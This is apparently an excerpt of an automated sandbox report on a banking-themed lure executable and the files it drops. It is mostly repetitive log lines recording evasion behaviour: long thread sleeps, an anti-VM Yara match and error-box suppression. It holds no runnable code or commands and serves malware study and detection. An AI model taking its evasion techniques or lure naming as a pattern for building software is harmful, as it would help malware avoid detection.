Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Ziraat_Bankasi_Swift_Messaji.png.exe PID: 2344, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BZTCUCKTKd.exe PID: 7576, type: MEMORYSTR

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Memory allocated: 1120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Memory allocated: 2AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Memory allocated: 4AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Memory allocated: 8FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Memory allocated: 9FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Memory allocated: A1C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Memory allocated: B1C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Memory allocated: 2000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Memory allocated: 25D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Memory allocated: 2180000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Memory allocated: 2210000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Memory allocated: 2450000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Memory allocated: 4450000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Memory allocated: 10F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Memory allocated: 2C70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Memory allocated: 10F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Memory allocated: 86F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Memory allocated: 6F60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Memory allocated: 96F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Memory allocated: A6F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Memory allocated: 2240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Memory allocated: 2420000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Memory allocated: 4420000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Memory allocated: 2150000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Memory allocated: 2580000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Memory allocated: 22E0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe

9_2_004019F0

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599563
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598859
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598750
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598641
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598532
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598407
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598282
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598157
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598047
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597938
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597813
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597688
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597563
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597438
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597328
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597219
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597094
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596873
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596766
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596657
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596532
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596407
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596282
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596063
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595938
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595799
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595672
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595563
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595438
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595313
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595194
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595078
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594969
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594750
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594641
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594516
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594391
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594282
Source: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599874
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599655
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599436
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599327
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598671
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597796
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597249
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 597031
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596918
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596593
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596484
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596374
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596233
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596125
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595905
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595797
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595684
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595490
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595246
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595140
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 595031
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594921
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594812
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594703
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594593
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594484
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Thread delayed: delay time: 594375

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7939	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 797	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8727	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 522	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Window / User API: threadDelayed 7599
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Window / User API: threadDelayed 2240
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Window / User API: foregroundWindowGot 1589
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Window / User API: threadDelayed 1860
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Window / User API: threadDelayed 8001

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe TID: 4124	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1700	Thread sleep count: 7939 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7348	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2412	Thread sleep count: 797 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7312	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -599563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -599438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -599203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -598969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -598859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -598750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -598641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -598532s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -598407s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -598282s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -598157s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -598047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe TID: 7968	Thread sleep time: -597938s >= -30000s
